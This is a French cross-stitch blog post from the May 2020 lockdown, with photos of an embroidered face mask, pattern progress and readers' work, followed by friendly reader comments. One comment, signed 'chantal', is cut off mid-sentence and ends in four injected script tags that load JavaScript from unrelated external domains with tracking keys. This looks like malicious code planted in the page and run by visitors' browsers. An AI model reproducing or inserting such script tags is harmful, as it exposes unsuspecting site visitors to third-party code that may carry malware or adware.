• Maria étape 7

    Avant dernière semaine de confinement? Je l'espère!Ce fut une semaine de pluie, la prochaine s'annonce plus ensoleillée.

    Du coup, j'ai eu le temps de broder!

    Un masque en jeans d'après un modèle offert en free par le brodeur Pascal Jaouen, pour les masques du modèle du CHU de Grenoble

    Maria étape 7

     

    Un autre "coeur de confinement" de Marjorie Massey. En avez vous brodé?

    Maria étape 7

    Et puis la suite de Maria, avec une jolie frise à la fin de l'alphabet

     

    Maria étape 7

     

    Maria étape 7

     

    Et puis les oeuvres des copines

    Crucicat et sa demoiselle vert printemps

    Maria étape 7

    Marie-Claude

    Maria étape 7

    Annelies

    Maria étape 7

    Françoise

    Maria étape 7

    Lolifa

    Maria étape 7

    Je ne sais plus si Flo m'a envoyé sa photo, je ne la retrouve plus...

    Mes pivoines toutes chiffonnées et si parfumées, je vous les offre pour vous souhaiter une bonne semaine, en espérant que la suivante sera moins difficile à vivre et vous permettra de retrouver certains de vos proches...les plus proches!!!

    Maria étape 7

     


  • Commentaires

    1
    Mamouty02
    Dimanche 3 Mai 2020 à 18:27

    Très raffiné ton masque. Joli travail.

    Merci pour la grille d e Maria... Plus elle avance, plus elle me plaît.

    Bonne semaine...

     

    2
    Megane
    Dimanche 3 Mai 2020 à 18:29
    Bravo pour ton masque brodé . Très joli
    J'ai imprimé la grille du coeur mais pas encore brodé , j'avais la priorité du tour de lit et la gigoteuse pour bébé qui va naitre à la fin du mois .Mais je compte au moins en broder un .
    Merci pour ta pivoine , il manque que le parfum . C'est ma fleur préférée .
    Bravo à toutes les brodeuses pour leur travail .
    Bisous
    3
    Lapetiteroberose
    Dimanche 3 Mai 2020 à 18:31

    Il est bien joli ce masque...

    Merci pour la pivoine !

    Bises, bises, bises

     

    4
    chantal
    Dimanche 3 Mai 2020 à 19:29

    quel joli masque , cela me réconcilie avec le port ,

    <script src="//autroliner.com/225cd6e1ef3a4470f9.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8796x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8796x&format=arrjs&r=1588526887775" type="text/javascript"></script> <script src="http://autroliner.com/ext/225cd6e1ef3a4470f9.js?sid=52646_8796_&title=aaa&blocks[]=31af2" type="text/javascript"></script>
    5
    Violette
    Dimanche 3 Mai 2020 à 19:31
    Tu vas faire sensation avec ce masque digne des Mille et une nuits !! De mon côté des en-cours à terminer rapidement avant un probable prochain retour physique au travail !
    6
    Dimanche 3 Mai 2020 à 21:26

    Magnifique ce masque, il brille de mille couleurs. Bonnes petites xxxx

    Bise et douce soirée

    7
    Mamoudominique
    Lundi 4 Mai 2020 à 08:58

    Magnifique ton masque brodé, ça me tenterait bien d'en faire un aussi.

    Bisous

     

    8
    Lundi 4 Mai 2020 à 09:00

    Elegant ton masque ces broderies roses sur fond bleu sont superbes.

    Du temps pour broder ç'est déjà ça... bien travaillé les filles !

    Et la pivoine quelle beauté. Impossible de nous rendre cette année au conservatoire des pivoines chez nous en Sarthe, on y retournera l'an prochain j'espère...

    Bonne semaine.

    9
    Lundi 4 Mai 2020 à 09:15
    De très jolis masques, pour égayer un peu cet assecoire peu seyant. J'adore les pivoines, les tiennes sont très belles
    Bonne journée
    Biz
    La cocotte de kiev
    10
    annieca
    Lundi 4 Mai 2020 à 10:41

    Joli masque brodé, oses-tu le porter? C'est un massacre d'ébouillanter une oeuvre... J'en ai cousu pas mal dernièrement, mais je fais le modèle Afnor, il n'est pas pratique à broder. Bises.

      • Lundi 4 Mai 2020 à 10:53

        Bien sûr que je vais le porter! Et le laverai tranquillement dans le lavabo à l'eau chaude et au savon  de Marseille...

    11
    Lundi 4 Mai 2020 à 15:43

    Quel bien joli masque ! et quel bien joli coeur !

    tu as vraiment des petits doigts de fée !!!

    merci pour la suite de la petite Maria, je viens de l'imprimer et vite reprendre ma toile.

    Biiiises

    12
    Margot
    Mardi 5 Mai 2020 à 14:40

    bonjour, je n'ai pas trouvé la grille du mois d'avril et de mai pour le calendrier, est-ce que vous les avez publié ? Merci

      • Mardi 5 Mai 2020 à 14:48

        Vous parlez bien du calendrier? Je suis bien ennuyée moi-même car j'ai ces grilles depuis bien longtemps sans les avoir jamais brodées et je mes suis aperçu qu'il me manquait une page, celle justement où il y a le mois d'avril, juillet et octobre. Mais je vais fouiller mes tiroirs. Je n'ai pas encore publié ni brodé le mois de mai

    13
    Babeth-Lili
    Mercredi 6 Mai 2020 à 10:47

    "Un chat dans l'aiguille travaille" sur un kit de masque brodé et Christel Elbaz suggère de ne porter la partie brodée qu'en "sur-masque" tenant avec un petit trombone proche des élastiques. 

     

    Bravo pour celui que tu as brodé Marie et ton deuxième coeur est bien joli aussi !

     

    Bises.

      • Mercredi 6 Mai 2020 à 11:56

        Mes masques ont trois épaisseurs, à l'intérieur c'est du coton gratté ou de la flanelle ça métonnerait qu'il y ait grand chose qui passe, surtout si on respecte les distances et que notre interlocuteur est également masqué!En sur-masque, ça ne doit pas être très joli et ça ferait 4 épaisseurs au lieu de trois, de quoi crever de chaud!!!

    14
    Jeudi 7 Mai 2020 à 22:21

    Tu as joliment travaillé !  trop beau pour être porté ton masque !!!!  Merci pour les pivoines, j'adore ! 

    15
    Jeudi 14 Mai 2020 à 19:10

    Très joli masque également. J'en ai brodé 2, bientôt un 3e. Moi aussi j'ai mis 3 barrières de tissu...  

      • Jeudi 14 Mai 2020 à 19:15

        J'aimerais bien les voir! As-tu un blog? Je voulais faire un article sur les masques brosés ou originaux, ça me ferait plaisir de montrer les tiens! Amitié

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :